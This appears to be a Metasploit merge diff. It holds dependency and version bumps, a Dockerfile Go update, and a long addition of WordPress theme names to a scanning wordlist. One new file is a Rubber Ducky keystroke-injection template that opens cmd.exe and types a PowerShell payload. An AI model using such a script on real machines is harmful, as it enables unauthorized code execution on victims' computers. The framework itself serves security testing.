automatic module_metadata_base.json update

Land #17163 , Pfsense PfBlockerNG RCE module check method improvement
Merge branch 'land-17163' into upstream-master
2022-12-01 09:50:22 -06:00 · 2022-12-01 09:25:18 -06:00 · 2022-11-30 16:55:15 -06:00 · 2022-11-30 22:31:53 +00:00 · 2022-11-30 22:10:18 +01:00 · 2022-11-30 11:43:21 -06:00
67 changed files with 9209 additions and 444 deletions
@@ -43,9 +43,9 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
-    tar -zxf go1.11.2.src.tar.gz && \
-    rm go1.11.2.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
+    tar -zxf go1.19.3.src.tar.gz && \
+    rm go1.19.3.src.tar.gz && \
    cd go/src && \
    ./make.bash

@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.26)
+    metasploit-framework (6.2.29)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -30,7 +30,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.99)
+      metasploit-payloads (= 2.0.101)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -128,30 +128,30 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.648.0)
-    aws-sdk-core (3.162.0)
+    aws-partitions (1.663.0)
+    aws-sdk-core (3.168.0)
      aws-eventstream (~> 1, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.525.0)
-      aws-sigv4 (~> 1.1)
+      aws-partitions (~> 1, >= 1.651.0)
+      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.341.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-ec2 (1.350.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.71.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-iam (1.73.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.58.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-kms (1.59.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.115.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-s3 (1.117.1)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
    aws-sigv4 (1.5.2)
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.13)
+    bindata (2.4.14)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
@@ -160,7 +160,7 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
-    debug (1.6.2)
+    debug (1.6.3)
      irb (>= 1.3.6)
      reline (>= 0.3.1)
    diff-lcs (1.5.0)
@@ -185,12 +185,12 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.23.0)
+    faker (3.0.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.6.0)
+    faraday (2.7.1)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (3.0.1)
+    faraday-net_http (3.0.2)
    faraday-retry (2.0.0)
      faraday (~> 2.0)
    faye-websocket (0.11.1)
@@ -216,7 +216,7 @@ GEM
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.5.11)
-    irb (1.4.2)
+    irb (1.4.3)
      reline (>= 0.3.0)
    jmespath (1.6.1)
    jsobfu (0.4.2)
@@ -229,7 +229,7 @@ GEM
    loofah (2.19.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    memory_profiler (1.0.0)
+    memory_profiler (1.0.1)
    metasm (1.0.5)
    metasploit-concern (4.0.5)
      activemodel (~> 6.0)
@@ -249,8 +249,8 @@ GEM
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.99)
-    metasploit_data_models (5.0.5)
+    metasploit-payloads (2.0.101)
+    metasploit_data_models (5.0.6)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
      arel-helpers
@@ -258,7 +258,7 @@ GEM
      metasploit-model (>= 3.1)
      pg
      railties (~> 6.0)
-      recog (~> 2.0)
+      recog
      webrick
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
@@ -273,7 +273,7 @@ GEM
    net-ldap (0.17.1)
    net-protocol (0.1.3)
      timeout
-    net-smtp (0.3.2)
+    net-smtp (0.3.3)
      net-protocol
    net-ssh (7.0.1)
    network_interface (0.0.2)
@@ -296,13 +296,13 @@ GEM
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
-    pdf-reader (2.10.0)
+    pdf-reader (2.11.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.4)
+    pg (1.4.5)
    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
@@ -314,7 +314,7 @@ GEM
      nio4r (~> 2.0)
    racc (1.6.0)
    rack (2.2.4)
-    rack-protection (3.0.2)
+    rack-protection (3.0.3)
      rack
    rack-test (2.0.2)
      rack (>= 1.3)
@@ -332,10 +332,10 @@ GEM
    rainbow (3.1.1)
    rake (13.0.6)
    rb-readline (0.5.5)
-    recog (2.3.23)
+    recog (3.0.3)
      nokogiri
    redcarpet (3.5.1)
-    regexp_parser (2.6.0)
+    regexp_parser (2.6.1)
    reline (0.3.1)
      io-console (~> 0.5)
    rex-arch (0.1.14)
@@ -388,18 +388,18 @@ GEM
      rex-text
    rexml (3.2.5)
    rkelly-remix (0.0.7)
-    rspec (3.11.0)
-      rspec-core (~> 3.11.0)
-      rspec-expectations (~> 3.11.0)
-      rspec-mocks (~> 3.11.0)
-    rspec-core (3.11.0)
-      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.1)
+    rspec (3.12.0)
+      rspec-core (~> 3.12.0)
+      rspec-expectations (~> 3.12.0)
+      rspec-mocks (~> 3.12.0)
+    rspec-core (3.12.0)
+      rspec-support (~> 3.12.0)
+    rspec-expectations (3.12.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-mocks (3.11.1)
+      rspec-support (~> 3.12.0)
+    rspec-mocks (3.12.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
+      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
@@ -410,25 +410,25 @@ GEM
      rspec-support (~> 3.11)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.1)
-    rubocop (1.37.0)
+    rspec-support (3.12.0)
+    rubocop (1.39.0)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.22.0, < 2.0)
+      rubocop-ast (>= 1.23.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.22.0)
+    rubocop-ast (1.23.0)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.0)
+    ruby_smb (3.2.1)
      bindata
      openssl-ccm
      openssl-cmac
@@ -445,12 +445,12 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.2)
+    sinatra (3.0.3)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.2)
+      rack-protection (= 3.0.3)
      tilt (~> 2.0)
-    sqlite3 (1.5.3)
+    sqlite3 (1.5.4)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
@@ -465,7 +465,7 @@ GEM
    ttfunk (1.7.0)
    tzinfo (2.0.5)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.5)
+    tzinfo-data (1.2022.6)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
@@ -496,7 +496,7 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.6.1)
+    zeitwerk (2.6.6)

 PLATFORMS
  ruby
@@ -70,9 +70,9 @@ memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.5, "New BSD"
 metasploit-credential, 5.0.9, "New BSD"
-metasploit-framework, 6.2.26, "New BSD"
+metasploit-framework, 6.2.29, "New BSD"
 metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.99, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.101, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
@@ -71,6 +71,8 @@
                        <B N="V"><%= arg[:value].to_s %></B>
                        <% elsif arg[:value].is_a? String %>
                        <S N="V"><%= arg[:value].encode(xml: :text) %></S>
+                        <% elsif arg[:value].is_a? Nokogiri::XML::Element %>
+                        <%= arg[:value].to_s %>
                        <% end %>
                      </MS>
                    </Obj>
@@ -0,0 +1,14 @@
+REM Title: Metasploit Generated Payload
+REM Description: Opens a payload via powershell on the system
+REM Version: 1.0
+REM Open start menu
+REM We use cmd.exe since the powershell payload is likely too long for the run bar
+GUI r
+DELAY 750
+STRING cmd.exe
+DELAY 750
+ENTER
+DELAY 750
+STRING powershell.exe %{var_payload}
+DELAY 750
+ENTER
@@ -168,17 +168,21 @@ aanews
 aanglo
 aapna
 aarambha-blogger
+aarambha-real-estate
 aargee
 aari
 aaron
 aaron-modified-intent
 aartus
+aasta
+aasta-light
 aav1
 aazeen
 ab
 ab-folio
 abacus
 abacus-hotel
+abadir
 abalane
 abaris
 abaya
@@ -204,6 +208,8 @@ abingle
 abiolian-business
 abisteel
 abitno
+ablanka
+ablanna
 able
 abletone
 ablog
@@ -239,6 +245,7 @@ abythens
 ac-board
 ac-care
 ac-repair
+ac-repair-services
 academic
 academic-clear
 academic-education
@@ -289,6 +296,8 @@ accountant-child
 accountantlaw
 accountants-theme
 accounting
+accounting-techup
+accountra
 accssesspress-stdasore
 ace
 ace-blog
@@ -312,6 +321,7 @@ acommerce
 acool
 acosminblogger
 acoustics
+across
 act-child
 act-theme-lite
 actify
@@ -396,6 +406,9 @@ adney
 adonis
 adorable-blog
 adoration
+adore-blog
+adore-business
+adore-news
 adri
 adrian-lite
 adrielly-saponi
@@ -414,17 +427,20 @@ advance-blog
 advance-blogging
 advance-business
 advance-coaching
+advance-consultancy
 advance-ecommerce-store
 advance-ecommerce-store1
 advance-education
 advance-fitness-gym
 advance-it-company
+advance-marketing-agency
 advance-one-page
 advance-pet-care
 advance-portfolio
 advance-portfolio-0-1
 advance-simple-blue
 advance-startup
+advance-techup
 advance1-fitness-gym
 advantage
 advent
@@ -442,6 +458,8 @@ adventure-travel
 adventure-travelling
 adventurous
 advertica-lite
+advertising-techup
+advertisingly-blog
 advik-blog-lite
 adviso
 advisory
@@ -457,7 +475,9 @@ aemi
 aemi-child
 aemon
 aeonaccess
+aeonblock
 aeonblog
+aeonium
 aeonmag
 aera
 aereo
@@ -481,8 +501,10 @@ affiliate-booster
 affiliate-booster-sk
 affiliate-marketingly
 affiliate-newspaperly
+affiliate-review
 affiliateblogwriter
 affiliates-bloglet
+affiliatex
 affilicious-theme
 affilistrap
 affilivice
@@ -518,6 +540,9 @@ agency-x
 agency-zita
 agencyup
 agencyup-dark
+agencywp
+agencyx
+agencyx-blog
 agensy
 aggiornare
 agile-spirit
@@ -526,9 +551,12 @@ agility-wp
 agindo
 agiva
 aglee-lite
+agnar
 agncy
 agni
 agri-lite
+agriculture-farm
+agriculture-farming
 agroamerica
 agronomics-lite
 aguafuerte
@@ -556,6 +584,7 @@ airi-patricia
 airi1
 airiteste
 airiwachswachs
+airl
 airmail-par-avion
 airnews
 airship
@@ -576,11 +605,14 @@ akarsh-blog
 akash
 akasse
 akbar
+akblog
 akella
 akhada-fitness-gym
 aki-blog
 akihabara
 akira
+akisa
+akisa-lite
 akks
 akpager
 aktivitetisormland
@@ -595,12 +627,15 @@ alacrity-lite
 aladdin
 alagu
 alamein
+alanah-free
 alanding-lite
 alante
+alante-blog
 alante-blue
 alante-boxed
 alante-business
 alante-corporate
+alante-dark
 alante-eboxed
 alante-ebusiness
 alante-emagazine
@@ -616,13 +651,16 @@ alante-x
 alante2
 alantrarose
 alara
+alaska-blog
 alaska-free
 alaymack
 alba
 alba-lite
 alba-tumblog
+albacore
 albar
 albatross
+alberta
 albinomouse
 albizia
 alce
@@ -684,6 +722,7 @@ alizee
 alkalia
 alkane
 alkimia
+alkio
 alkivia-chameleon
 alku
 all-about-coffee
@@ -704,7 +743,10 @@ allegiant
 allegiant-2
 allegiant1
 allegiantly
+allegro
+allele
 alleria
+alley
 alley-home-services
 alley-themes
 allied-uri-httpflytunes-fmthemesaries
@@ -739,6 +781,7 @@ alodabaty-uri-httpswww-alodabaty-com
 alodabaty-uri-httpswww-alodabaty-comthemesalodabatymagazine-lite
 alodabaty-uri-httpswww-alodabaty-comthemesmhmagazine-lite
 aloja
+alok
 alones
 alovernat
 alowa
@@ -791,6 +834,7 @@ alurra
 alux
 alvaro-uri-httpsthemepalace-comdownloadstravel-ultimate
 alvn-pizza
+always
 always-twittingtwitter-themeat4us
 alyena
 alyssas-blog
@@ -829,6 +873,7 @@ ambiguity
 ambika
 ambirurmxd
 ambision
+ambitio
 ambition
 ambling-bellows
 ambrosia
@@ -865,6 +910,7 @@ amoresyamores
 amp
 amp-accelerated-mobile-pages
 amp-publisher
+ampark
 ampbase
 ampface
 ampface-base
@@ -900,16 +946,19 @@ anacronico-uri-httpanacroniconet63netblog
 anadbry
 anaglyph-lite
 anakin-mobile
+analog
 analogbd
 analogous
 analytica
 analytical-lite
+anamio
 anand
 ananya
 anarcho-notepad
 anassar
 anatomy-lite
 anatta
+anc-news
 anchor
 anchorage
 andar
@@ -933,6 +982,7 @@ andygray
 anecdote-lite
 aneeq
 anew
+anews
 anexa
 anfaust
 anfolder
@@ -951,6 +1001,9 @@ ani-world
 aniki
 anila
 anima
+animal-pet-care
+animal-pet-shop
+animal-wildlife
 animals
 animass
 animate-lite
@@ -1010,6 +1063,7 @@ anvil-theme
 anvys
 anya
 anymags
+anymags-blog
 anymags-news
 anyna
 anyonepage
@@ -1020,6 +1074,7 @@ anzelysajt
 anzu
 aocean
 aos-second-version
+apace
 apazit
 apbt
 apelle-uno
@@ -1050,9 +1105,11 @@ apostrophe
 apothecary
 app-landing-page
 app7
+apparel-store
 appcloud
 appdetail
 appeal
+appetizer
 appgate
 apple
 apple-mac-os-x-leopard
@@ -1066,6 +1123,7 @@ application
 applicator
 appmela
 appointable
+appointech
 appointee
 appointment
 appointment-blue
@@ -1079,6 +1137,7 @@ apppage
 apppresser-mobile
 appre
 apprise
+approach
 appsense
 appsetter
 apptheme-free
@@ -1090,6 +1149,7 @@ apricot
 apricot-blog
 apt-news
 apweb
+aqeeq-agency
 aqua
 aqua-black
 aqua-blue
@@ -1097,6 +1157,7 @@ aqua-portfolio
 aqua10
 aquaapp
 aquablock
+aquafy-starter
 aquaparallax
 aquarella-lite
 aquarius
@@ -1126,6 +1187,7 @@ arbitragex
 arbuda
 arbune
 arbutus
+arc-fse
 arcade-basic
 arcade-basic-loff
 arcade-by-frelocaters
@@ -1133,6 +1195,7 @@ arcana
 arcanum
 arcegator
 arche
+archeo
 archie
 archimedes
 architect
@@ -1140,10 +1203,14 @@ architect-architecture
 architect-decor
 architect-design
 architect-designs
+architect-engineer
 architect-lite
+architecto
 architectonic
 architects
 architecture
+architecture-building
+architecture-designer
 architectwp
 archy
 arclite
@@ -1170,6 +1237,7 @@ argonia
 ari
 ari-p
 ariana
+aribest
 aribiz
 ariblog
 ariboom
@@ -1194,6 +1262,7 @@ ariniom
 aripop
 ariqube
 arise
+arison-lite
 ariwoo
 arix
 arixoo
@@ -1209,8 +1278,12 @@ armada
 armadillo
 arman
 armando
+armata
 armenia
+armonia
+aroid
 aromafashion
+aromatic
 aromatry
 aron
 aronia
@@ -1225,7 +1298,9 @@ arrival-store
 ars-cv
 arsenaloide
 art-blogazine
+art-catalogue
 art-gallery
+art-gallery-museum
 art-magazine
 arta
 artblog
@@ -1237,6 +1312,7 @@ artefact
 artemis
 artera
 artera-1-0
+arterior
 artex
 artfolio
 artgallery
@@ -1254,6 +1330,7 @@ artikler-theme
 artisan
 artist
 artist-lite
+artist-portfolio
 artistas
 artistic
 artistic-blog
@@ -1270,12 +1347,14 @@ artsavius-blog
 artsavius-wave
 artsblue
 artsgreen
+artsylens
 arturo-theme
 artwork
 artwork-lite
 arun
 arunachala
 aruz
+arvada
 arwebstudio
 arwen
 arya-multipurpose
@@ -1291,6 +1370,7 @@ ascendant
 ascendant-1
 ascendanthh
 ascendente
+ascendoor-magazine
 ascension
 ascent
 ascent-free
@@ -1316,17 +1396,21 @@ ashe1
 ashe2
 ashea
 ashee
+ashlar
 ashmi
 ashram
 ashvalejohn-child
 asia-garden
 asian-restaurant
 asimuk-one
+askella
 asket-magazine
+askiw
 asmartgs
 asokay
 asonant
 aspace
+aspace-free
 aspen
 aspiration-i
 aspire
@@ -1344,6 +1428,7 @@ aster
 asteria-lite
 asteria-lite2
 asterion
+asterisk-lite
 asteroid
 astha
 asthir
@@ -1354,6 +1439,7 @@ astn
 astoned
 astore
 astori
+astory
 astra
 astra-brixco-frd
 astrad
@@ -1394,6 +1480,7 @@ atiframe-builder
 atlanta
 atlantaa
 atlantic
+atlantisak
 atlas
 atlas-concern
 atlas-re5
@@ -1431,6 +1518,7 @@ attractwhite-theme
 atwitteration
 atwood
 atwpthemes-jasper
+atyra
 au-restaurant
 auberge
 auberge-plus
@@ -1471,6 +1559,9 @@ author
 author-author
 author-blog
 author-landing-page
+author-personal-blog
+author-portfolio
+author-writer
 authorcentric
 authoredrobertson
 authority
@@ -1484,11 +1575,14 @@ autmunport
 autmunport-1-1
 auto-car
 auto-car-care
+auto-car-dealership
 auto-d
 auto-dealer
+auto-dealer-lite
 auto-dezmembrari
 auto-insurance-theme
 auto-load-next-post-make
+auto-motors
 auto-show
 auto-store
 auto-theme
@@ -1500,7 +1594,9 @@ autofocus-lite
 autograph
 automobile
 automobile-car-dealer
+automobile-car-services
 automobile-hub
+automobile-shop
 automotive-blog-theme
 automotive-centre
 autoprice24-auto-parts-shop
@@ -1525,6 +1621,14 @@ avadanta-agency
 avadanta-business
 avadanta-consulting
 avadanta-corporate
+avadanta-dark
+avadanta-deal
+avadanta-finance
+avadanta-firm
+avadanta-industry
+avadanta-invest
+avadanta-tech
+avadanta-trade
 avadar
 avail
 avak-fitness
@@ -1535,6 +1639,7 @@ avalon-b
 avani
 avanish
 avant
+avant-garde
 avant-portfolio
 avant-x
 avante
@@ -1564,7 +1669,9 @@ avik
 avior
 avira
 avis-lite
+aviser
 avish
+avitech
 avix-designs
 avnii
 avoca
@@ -1573,9 +1680,11 @@ avocation
 avogue
 avon
 avon-lite
+avova
 avril
 avrilly
 avrora
+avtari
 avum
 avventura-lite
 avvocato
@@ -1621,6 +1730,7 @@ axiohost
 axiom
 axis-magazine
 axtia
+axton
 axtria
 aya
 ayaairport
@@ -1645,6 +1755,8 @@ ayawild
 aydinmu
 aye-bruh-man-look
 aye-carumba
+ayroma
+aytias
 ayumi
 ayyash
 az
@@ -1727,14 +1839,17 @@ baena
 bagility
 bahama
 bai
+baithak
 bajaar
 bakedwp
 bakerblues
 bakeroner
 bakers-lite
 bakery
+bakery-cafe
 bakery-food
 bakery-shop
+bakery-store
 bakes
 bakes-and-cakes
 bakes-and-cakes-with-a-pinch-of-love
@@ -1745,6 +1860,7 @@ baleen
 balloonr
 balloonsongreen
 ballyhoo
+ballyhoo-blocks
 baltic
 baltimore-phototheme
 bam
@@ -1771,6 +1887,7 @@ barbara
 barbaros-tinos
 barber
 barber-lite
+barbershop-nail-salon
 barcelona
 barclays
 barcode-uri-httpswoocommerce-comstorefront
@@ -1782,6 +1899,7 @@ barebrick
 baris
 bariskkk
 barista
+barista-coffee-shop
 barkly
 barletta
 barlow
@@ -1865,6 +1983,7 @@ bb10
 bba
 bbcc-theme
 bbird-under
+bblog
 bbold
 bbold-lite
 bbpress-and-canvas-fix-canvas-child-theme
@@ -1902,6 +2021,7 @@ beardsley
 beastin
 beat-mix-lite
 beatrix-lite
+beaumont
 beautiful
 beautiful-blog
 beautiful-bootstrap-starter-theme
@@ -1918,6 +2038,7 @@ beauty-and-spa
 beauty-clean
 beauty-cosemic
 beauty-dots
+beauty-hair-salon
 beauty-is-beauty
 beauty-lab
 beauty-land
@@ -1925,8 +2046,12 @@ beauty-light
 beauty-mart
 beauty-mountain
 beauty-parlour
+beauty-salon
+beauty-salon-lite
+beauty-salon-spa
 beauty-saloon
 beauty-spa
+beauty-spa-elementor
 beauty-spa-salon
 beauty-studio
 beauty-studio-pro
@@ -1948,6 +2073,7 @@ becrux
 bee-fashion
 bee-news
 beecrew
+beetan
 beetech
 beetheme
 beetle
@@ -1957,6 +2083,7 @@ beflex
 befold
 befreiphone
 beginner
+beginner-blog
 beginnings
 begonia
 begonia-lite
@@ -1971,6 +2098,7 @@ bekko
 belajar
 belajar_v1-0
 belfast
+beli
 believe
 belinni-lite
 belise-lite
@@ -1991,6 +2119,7 @@ belly
 bellyrn
 beluga
 bemainty
+benawp-bootstrap-portfolio
 benetinvest
 benevolence
 benevolent
@@ -2014,6 +2143,7 @@ beoreo-shared-by-vestathemes-com
 bepopshop-theme
 bere-elegant
 bergenwp
+bergify
 beri_cafe
 bering
 berkeley
@@ -2040,16 +2170,20 @@ best-education
 best-food
 best-hotel
 best-learner
+best-listing
 best-magazine
 best-minimal-restaurant
 best-minimalist
 best-movie-theme
 best-news
+best-recipe
 best-reloaded
 best-restaurant
+best-shop
 best-simple
 best-startup
 best-wp
+bestblogger
 besteurful
 bestore
 bestrespo
@@ -2063,11 +2197,13 @@ beth
 betilu
 beton
 better-health
+better-news-vibe
 betti-style
 betube
 beverly
 bevro
 bexley
+bexplore
 beyond-expectations
 beyond-magazine
 beyrouth
@@ -2081,9 +2217,11 @@ bg-photo-frame
 bg-teline-theme
 bgreen
 bhaga
+bhakti
 bhali16
 bharat
 bhari
+bhavana
 bhost
 bhtech-right-column
 bhumi
@@ -2100,6 +2238,7 @@ bicbb
 bicubic
 bicycle
 bicycle-rental
+bicycle-repair
 bicycleshop
 biddo
 bidhantech
@@ -2108,12 +2247,16 @@ big-bang
 big-blank-responsive-theme
 big-blue
 big-bob
+big-breeze
 big-brother
 big-buttons
 big-city
 big-dot-2-0
 big-impresa
+big-lights
 big-little-something
+big-media
+big-patterns
 big-pink
 big-pix
 big-red-framework
@@ -2122,9 +2265,11 @@ big-stone
 big-store
 bigblank
 bigblank2
+bigbulletin
 bigbusiness
 bigc
 bigcitylife
+bigmart
 bigrecipe
 bigred
 bigseo-theme-lite
@@ -2163,6 +2308,7 @@ biopsia
 bioship
 biostorelite
 biotodoma
+bioxlog
 birchware-kiss
 bird-flight
 birdfield
@@ -2191,6 +2337,7 @@ bistic
 bistro
 bistro-lite
 bitcoinee
+bitin
 bitlumen
 bito
 bits
@@ -2224,6 +2371,8 @@ bizcent
 bizconsulting
 bizcorp
 bizdir
+bizemla
+bizes
 bizfit
 bizflare
 bizflow
@@ -2233,6 +2382,7 @@ bizgrowth
 bizgrowth2
 bizhunt
 bizin
+bizindustries
 bizkit
 bizlight
 bizline
@@ -2240,12 +2390,14 @@ bizlite
 bizlite-business
 bizmark
 bizmart
+bizmax
 bizmo
 biznesspack
 biznez-lite
 biznis
 bizniz
 biznol
+biznotch
 bizonex
 bizplan
 bizplus
@@ -2258,6 +2410,7 @@ bizsmart
 bizsphere
 bizstart
 bizstartup
+bizstrait
 bizstudio-lite
 bizstudio-lite-demo
 biztheme
@@ -2274,17 +2427,21 @@ bizway-responsive
 bizwhoop
 bizwhoop1
 bizwide
+bizworld-lite
 bizworx
 bizz-builder
+bizz-ecommerce
 bizz-trip
 bizzbee
 bizzboss
+bizzcorp-lite
 bizzer
 bizzmo
 bizznik
 bizznis
 bizzoy
 bizzy
+bjork
 bkk-theme
 bl-flower
 blablasaq
@@ -2400,8 +2557,11 @@ blagz-blog-magazine-theme
 blain
 blaize
 blakely
+blakely-light
 blanc
 blanche-lite
+blanco
+blanco-lite
 blank
 blank-canvas
 blank-page
@@ -2439,6 +2599,7 @@ blight-light-blog
 blind
 bliss
 blissful
+blite
 blitz
 bloatless
 bloc99
@@ -2446,15 +2607,25 @@ blocade
 blocal
 block
 block-based-bosco
+block-builder
 block-lite
 blockbase
 blockchain-lite
 blocked
+blockem
+blockette
 blockfield
+blockfold
+blockify
+blockio
+blockpress
 blocks
 blocks-v1-3
 blocks2
+blockst
+blockstrap
 blocksy
+blockwp
 blockz
 blocomo
 blocomo-theme
@@ -2464,6 +2635,7 @@ blog-64
 blog-aarambha
 blog-and-blog
 blog-and-blog-sultan
+blog-art
 blog-bank
 blog-bank-classic
 blog-bank-lite
@@ -2487,8 +2659,11 @@ blog-era
 blog-era-plus
 blog-expert
 blog-express
+blog-eye
 blog-fever
 blog-first
+blog-foodie
+blog-forever
 blog-gird
 blog-grid
 blog-guten
@@ -2524,8 +2699,10 @@ blog-one-by-michael-f
 blog-one-bywebsitedeluxcom
 blog-page
 blog-path
+blog-perk
 blog-personal
 blog-personal-plus
+blog-plus
 blog-prime
 blog-producer-coolblue
 blog-rider
@@ -2533,7 +2710,10 @@ blog-star
 blog-start
 blog-starter
 blog-station
+blog-story
+blog-tale
 blog-tales
+blog-talk
 blog-theme
 blog-times
 blog-town
@@ -2541,8 +2721,10 @@ blog-vlog
 blog-warrior-theme
 blog-way
 blog-web
+blog-world
 blog-writer
 blog-writing
+blog-x
 blog-zone
 blog-zone-update
 blog0sphere
@@ -2575,17 +2757,21 @@ blogbox
 blogbuzz
 blogcafe
 blogcentral
+blogcraft
 blogdaily
+blogdesign
 blogdot
 bloge
 blogeasy
 blogen
+blogendar
 bloger
 blogera
 blogery
 blogever
 blogexpress
 blogfeedly
+blogfi
 blogfolio
 blogg
 blogga
@@ -2603,6 +2789,7 @@ blogger-hub
 blogger-light
 blogger-lite
 blogger-notes
+blogger-spot
 bloggerbuz
 bloggering
 bloggermom
@@ -2631,34 +2818,46 @@ bloggy
 bloggy-fourteen
 bloggy-grass
 bloggy-v-2-child-theme
+bloghill
+bloghovar
 bloghut
 blogi
+blogic
 blogiee
 blogification
 blogified
 blogify
 blogim
+blogin
 bloging
 bloginn
 bloginner
+bloginwp
 blogio
 blogism
 blogist
 blogista
 blogists
+blogita
 blogitad
 blogito
 blogjr
+blogjr-dark
 blogjr-photography
 blogjr-portfolio
+blogkeeda
 blogkori
 bloglane
 blogline
 blogling
 bloglite
+bloglog
 blogly-lite
+blogmag
 blogmagazine
 blogmaster
+blogmax
+blogmax-news
 blogme
 blogmedia
 blogmelody
@@ -2670,6 +2869,7 @@ blogo
 blogoholic
 blogolife
 blogoloution-1-0
+blogood
 blogora
 blogos
 blogostrap
@@ -2678,28 +2878,37 @@ blogpal
 blogpark
 blogpecos
 blogpedia
+blogpost
 blogpost-lite
 blogposts-uri-httpwww-forcabe-pt
 blogpress
 blogpress-16
 blogpress-2016
 blogr
+blogrank
 blograzzi
 blogrid
 blogrock-core
 blogrow
+blogsen
+blogshare
 blogshining
 blogshop
+blogsia
 blogside
 blogsimplified
 blogsimplified-blackneon
 blogsimplified-three-column-adsense10
+blogsite
 blogsixteen
 blogslog
 blogslog-pro
 blogsonry
+blogsoul
+blogspace
 blogspreneur-themes
 blogspring-theme
+blogsquare
 blogstandard-theme
 blogstandard-v1
 blogstart
@@ -2710,9 +2919,11 @@ blogstrap
 blogstream
 blogstyle
 blogtay
+blogtech
 blogtime
 blogtina
 blogto
+blogtory
 blogtour
 blogtxt
 blogup
@@ -2730,6 +2941,7 @@ blogz
 blogzen
 blogzilla
 blogzine
+blogzone
 blogzy
 blokeish-aries
 blood-red-flower
@@ -2756,6 +2968,7 @@ blossom-fashion
 blossom-feminine
 blossom-floral
 blossom-health-coach
+blossom-magazine
 blossom-mommy-blog
 blossom-pin
 blossom-pinit
@@ -2985,6 +3198,7 @@ blush
 bluvoox
 bm-hope
 bmag
+bmci
 bnetinvest
 board-blocks
 board-blue
@@ -3023,6 +3237,7 @@ bold-photography-pro
 bolder
 boldly-go-blue
 boldly-go-green
+boldnews
 boldr-lite
 boldwp
 boleh
@@ -3044,15 +3259,18 @@ bonny
 bonsai-blog
 bonyo
 book
+book-author-blog
 book-inspiration
 book-land
 book-landing-page
 book-lite
+book-publisher
 book-rev-lite
 bookburner
 bookkeeping
 bookkeeping-free
 bookmark
+bookstore-library
 boonik
